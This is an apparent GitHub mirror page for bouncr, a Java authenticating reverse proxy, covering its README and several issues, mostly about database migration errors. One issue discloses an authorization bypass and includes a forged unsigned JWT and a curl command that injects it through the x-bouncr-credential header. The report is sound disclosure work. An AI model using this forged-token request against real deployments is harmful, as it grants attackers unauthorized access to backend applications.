GithubHelp home page GithubHelp logo

kawasima / bouncr Goto Github PK

View Code? Open in Web Editor NEW
21.0 5.0 10.0 1.04 MB

A reverse proxy with authentication and authorization

License: Eclipse Public License 1.0

Java 99.65% Shell 0.05% JavaScript 0.18% HTML 0.12%
authorization authentication permissions audit reverse-proxy

bouncr's Introduction

Bouncr

Bouncr is an reverse proxy with authentication and authorization for backend applications.

bouncer

Bouncer has following features:

  • Authenticate
    • Various types of credentials
      • Password
      • LDAP
      • OpenID Connect
    • Two factor authentication (using by Google authenticator etc)
  • Authorization (based on Group - Role - Permission)
  • Sign in
  • Sign out
  • Audit
    • Show security activities
  • IdP
    • OpenID Connect provider
  • Administration pages
    • Manage users
    • Manage groups
    • Manage applications and realms
    • Manage roles
    • Manage OpenID Connect applications

bouncr architecture

Docker

You can build the docker image of the api server and the proxy server using by jib.

% cd bouncr-api-server
% mvn -P\!dev,postgresql,hazelcast compile jib:dockerBuild

% cd bouncr-proxy
% mvn -P\!dev,postgresql,hazelcast compile jib:dockerBuild

docker-compose.yml can run the api server and the proxy server with Hazelcast and Postgresql database.

License

Copyright © 2017-2019 kawasima

Distributed under the Eclipse Public License, the same as Clojure.

bouncr's People

Contributors

blackawa avatar kawasima avatar kkasai avatar miyamoen avatar syobochim avatar yamatokeiichi avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar

Forkers

miyamoen kkasai syobochim blackawa guoyu07 harvyso madcid idontusenumbers thaingo codeshane

bouncr's Issues

ALTER TABLE ... CHANGE COLUMN .. is needed column_definition in MySQL.

V22__AlterInvitations.java is creating ddl such as alter table oidc_invitations change oidc_sub oidc_payload; in MySQL database, but it does not work.
It should be like alter table oidc_invitations change oidc_sub oidc_payload varchar(255); . It is confirmed to work in command line.

Can not create CreateUserProfiles

When bouncr is executed, the following error occurs.
Because regexp is reserved word.
https://dev.mysql.com/doc/refman/5.6/ja/reserved-words.html

[main] INFO org.flywaydb.core.internal.command.DbMigrate - Migrating schema `bouncr` to version 20 - CreateCerts       
[main] INFO org.flywaydb.core.internal.command.DbMigrate - Migrating schema `bouncr` to version 21 - CreateUserProfiles
Exception in thread "main" org.flywaydb.core.api.FlywayException: Migration failed !
        at org.flywaydb.core.internal.resolver.jdbc.JdbcMigrationExecutor.execute(JdbcMigrationExecutor.java:47)
        at org.flywaydb.core.internal.command.DbMigrate.doMigrateGroup(DbMigrate.java:343)
        at org.flywaydb.core.internal.command.DbMigrate.access$900(DbMigrate.java:53)
        at org.flywaydb.core.internal.command.DbMigrate$4.call(DbMigrate.java:276)
        at org.flywaydb.core.internal.util.jdbc.TransactionTemplate.execute(TransactionTemplate.java:75)
        at org.flywaydb.core.internal.command.DbMigrate.applyMigrations(DbMigrate.java:273)
        at org.flywaydb.core.internal.command.DbMigrate.access$800(DbMigrate.java:53)
        at org.flywaydb.core.internal.command.DbMigrate$2.call(DbMigrate.java:210)
        at org.flywaydb.core.internal.command.DbMigrate$2.call(DbMigrate.java:146)
        at org.flywaydb.core.internal.dbsupport.mysql.MySQLNamedLockTemplate.execute(MySQLNamedLockTemplate.java:60)
        at org.flywaydb.core.internal.dbsupport.mysql.MySQLDbSupport.lock(MySQLDbSupport.java:129)
        at org.flywaydb.core.internal.metadatatable.MetaDataTableImpl.lock(MetaDataTableImpl.java:174)
        at org.flywaydb.core.internal.command.DbMigrate.migrate(DbMigrate.java:146)
        at org.flywaydb.core.Flyway$1.execute(Flyway.java:1010)
        at org.flywaydb.core.Flyway$1.execute(Flyway.java:971)
        at org.flywaydb.core.Flyway.execute(Flyway.java:1464)
        at org.flywaydb.core.Flyway.migrate(Flyway.java:971)
        at enkan.component.flyway.FlywayMigration$1.start(FlywayMigration.java:56)
        at enkan.component.flyway.FlywayMigration$1.start(FlywayMigration.java:42)
        at enkan.component.LifecycleManager.start(LifecycleManager.java:15)
        at java.util.stream.ForEachOps$ForEachOp$OfRef.accept(ForEachOps.java:184)
        at java.util.stream.ReferencePipeline$3$1.accept(ReferencePipeline.java:193)
        at java.util.LinkedList$LLSpliterator.forEachRemaining(LinkedList.java:1235)
        at java.util.stream.AbstractPipeline.copyInto(AbstractPipeline.java:481)
        at java.util.stream.AbstractPipeline.wrapAndCopyInto(AbstractPipeline.java:471)
        at java.util.stream.ForEachOps$ForEachOp.evaluateSequential(ForEachOps.java:151)
        at java.util.stream.ForEachOps$ForEachOp$OfRef.evaluateSequential(ForEachOps.java:174)
        at java.util.stream.AbstractPipeline.evaluate(AbstractPipeline.java:234)
        at java.util.stream.ReferencePipeline.forEach(ReferencePipeline.java:418)
        at enkan.system.EnkanSystem.start(EnkanSystem.java:83)
        at net.unit8.bouncr.Main.main(Main.java:21)
Caused by: com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version fo
r the right syntax to use near 'regexp varchar(100) null, min_length smallint null, max_length smallint null, po' at line 1
        at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
        at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
        at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
        at java.lang.reflect.Constructor.newInstance(Constructor.java:423)
        at com.mysql.jdbc.Util.handleNewInstance(Util.java:425)
        at com.mysql.jdbc.Util.getInstance(Util.java:408)
        at com.mysql.jdbc.SQLError.createSQLException(SQLError.java:943)
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3973)
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3909)
        at com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:2527)
        at com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2680)
        at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2483)
        at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2441)
        at com.mysql.jdbc.StatementImpl.executeInternal(StatementImpl.java:845)
        at com.mysql.jdbc.StatementImpl.execute(StatementImpl.java:745)
        at com.zaxxer.hikari.pool.ProxyStatement.execute(ProxyStatement.java:92)
        at com.zaxxer.hikari.pool.HikariProxyStatement.execute(HikariProxyStatement.java)
        at db.migration.V21__CreateUserProfiles.migrate(V21__CreateUserProfiles.java:31)
        at org.flywaydb.core.internal.resolver.jdbc.JdbcMigrationExecutor.execute(JdbcMigrationExecutor.java:45)
        ... 30 more

SecureRandom.getInstance("NativePRNGNonBlocking") causes NoSuchAlgorithmException on Windows

On Windows10, I would like to try it but unfortunately it fails.
I examined this code and I found that "NativePRNGNonBlocking" was not implemented on Windows.

https://qiita.com/aibax/items/29e09318ac85c4e93c1a
https://docs.oracle.com/javase/jp/8/docs/technotes/guides/security/StandardNames.html#SecureRandom

It would be appreciated for me if this report is helpful.

The stacktrace is as follows:

enkan> /start
enkan.exception.UnreachableException: This exception has proved a framework bug.
        at net.unit8.bouncr.component.BouncrConfiguration$1.start(BouncrConfiguration.java:33)
        at net.unit8.bouncr.component.BouncrConfiguration$1.start(BouncrConfiguration.java:25)
        at enkan.component.LifecycleManager.start(LifecycleManager.java:15)
        at java.util.stream.ForEachOps$ForEachOp$OfRef.accept(ForEachOps.java:184)
        at java.util.stream.ReferencePipeline$3$1.accept(ReferencePipeline.java:193)
        at java.util.LinkedList$LLSpliterator.forEachRemaining(LinkedList.java:1235)
        at java.util.stream.AbstractPipeline.copyInto(AbstractPipeline.java:481)
        at java.util.stream.AbstractPipeline.wrapAndCopyInto(AbstractPipeline.java:471)
        at java.util.stream.ForEachOps$ForEachOp.evaluateSequential(ForEachOps.java:151)
        at java.util.stream.ForEachOps$ForEachOp$OfRef.evaluateSequential(ForEachOps.java:174)
        at java.util.stream.AbstractPipeline.evaluate(AbstractPipeline.java:234)
        at java.util.stream.ReferencePipeline.forEach(ReferencePipeline.java:418)
        at enkan.system.EnkanSystem.start(EnkanSystem.java:83)
        at enkan.system.repl.PseudoRepl.lambda$new$2(PseudoRepl.java:51)
        at enkan.system.repl.PseudoRepl.lambda$run$8(PseudoRepl.java:149)
        at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
        at java.util.concurrent.FutureTask.run(FutureTask.java:266)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
        at java.lang.Thread.run(Thread.java:748)

Reset a password

When an user has forgot his password, there is no way to reset it.

bouncr-proxy can pass attacker's jwt to backend applications

Problem

bouncr-proxy allows attackers to access to backend applications with any permissions.

  1. bouncr-proxy passes jwt to backend application with no signing algorithm.
  2. bouncr-proxy do not remove x-bouncr-credential request header from outside of proxy.

This means anyone can pass any jwt to backend applications.

How to reproduce

Run docker-compose.yml

docker-compose up -d

Create jwt with this kind of payload

{"name":"attacker","iss":"attacker","uid":"1","sub":"attacker","email":"[email protected]","permissions":["any_application:read"]}

Create request to bouncr-api-server

curl -XGET -H 'accept: application/json' -H 'content-type: application/json' -H 'x-bouncr-credential: eyJhbGciOiJub25lIiwia2lkIjpudWxsfQ.eyJuYW1lIjoiYXR0YWNrZXIiLCJpc3MiOiJhdHRhY2tlciIsInVpZCI6IjEiLCJzdWIiOiJhdHRhY2tlciIsImVtYWlsIjoiYXR0YWNrZXJAZXhhbXBsZS5jb20iLCJwZXJtaXNzaW9ucyI6WyJhbnlfYXBwbGljYXRpb246cmVhZCJdfQ.' localhost:3000/bouncr/api/applications | jq

This returns 200 OK.

How to resolve

bouncr-proxy should reject x-bouncr-credential or any backendHederName.

Please make table name lowercase when creating a sql by doma.

Some entities are set table name by uppercase, like below.

bouncr/src/main/java/net/unit8/bouncr/web/entity/PasswordCredential.java

Line 16 in f850c13

@Table(name = "PASSWORD_CREDENTIALS")

However, all tables are created by lowercase, and in some situations, lower_case_table_names option cannot be set to Mysql.
It causes table not found exception when setting new password.
So, if it has not any other use, please make table name lowercase when creating a sql by using doma.

DDL creation failed.

DDL for password_credentials table creation failed.

Caused by: com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?, created_at timestamp not null, primary key (user_id), foreign key (user_id) r' at line 1
        at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
        at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
        at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
        at java.lang.reflect.Constructor.newInstance(Constructor.java:423)
        at com.mysql.jdbc.Util.handleNewInstance(Util.java:425)
        at com.mysql.jdbc.Util.getInstance(Util.java:408)
        at com.mysql.jdbc.SQLError.createSQLException(SQLError.java:943)
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3973)
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3909)
        at com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:2527)
        at com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2680)
        at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2483)
        at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2441)
        at com.mysql.jdbc.StatementImpl.executeInternal(StatementImpl.java:845)
        at com.mysql.jdbc.StatementImpl.execute(StatementImpl.java:745)
        at com.zaxxer.hikari.pool.ProxyStatement.execute(ProxyStatement.java:92)
        at com.zaxxer.hikari.pool.HikariProxyStatement.execute(HikariProxyStatement.java)
        at db.migration.V10__CreatePasswordCredentials.migrate(V10__CreatePasswordCredentials.java:28)
        at org.flywaydb.core.internal.resolver.jdbc.JdbcMigrationExecutor.execute(JdbcMigrationExecutor.java:45)
        ... 30 more

It is like this,
create table password_credentials(user_id bigint not null, password varbinary(256) not null, salt varchar(16) not null, initial boolean not null default ?, created_at timestamp not null, primary key (user_id), foreign key (user_id) references users (user_id))

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.